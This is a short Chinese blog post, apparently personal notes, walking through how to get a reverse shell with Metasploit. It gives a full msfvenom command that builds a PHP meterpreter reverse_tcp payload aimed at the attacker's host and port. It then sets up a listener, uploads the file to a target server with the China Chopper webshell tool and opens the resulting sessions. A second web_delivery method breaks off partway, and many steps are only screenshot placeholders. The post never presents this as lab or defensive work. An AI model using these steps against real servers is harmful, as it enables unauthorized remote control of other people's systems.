今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

反弹shell的两种方法

msf反弹shell 随笔 第1张

 

 第一种Msfvenom实例:

1、msfconsole    #启动msf

2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反弹shell文件

LHOST表示本地攻击机的ip, LPORT表示本地攻击机的端口。

其他msf下的各种生成payload命令可参考https://www.cnblogs.com/backlion/p/6000544.html

msf反弹shell 随笔 第2张

这样我们就成功生成了一个shell.php文件。

3、接下来我们需要在本机中监听4444端口。

msf反弹shell 随笔 第3张

msf反弹shell 随笔 第4张

msf反弹shell 随笔 第5张

这就表示开始本机开始监听4444端口了。

4、现在把shell.php文件通过菜刀上传至目标服务器中,然后本地游览器访问shell.php

msf反弹shell 随笔 第6张

 即可以看见成功返回了一个session

msf反弹shell 随笔 第7张

sessions -i     #查看当前可用会话

msf反弹shell 随笔 第8张

msf反弹shell 随笔 第9张

 

 第二种web_delivery实例流程:

 1、msfconsole    #启动msf

msf反弹shell 随笔 第10张

2、show options    #目的是看exploit target为什么脚本

这里默认为pyhton,需要更改为php

msf反弹shell 随笔 第11张

msf反弹shell 随笔 第12张

show payloads    #挑选payload,选择php/meterpreter/reverse_tcp

msf反弹shell 随笔 第13张

然后设置lhost

msf反弹shell 随笔 第14张

msf反弹shell 随笔 第15张

得到


 

 

 

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄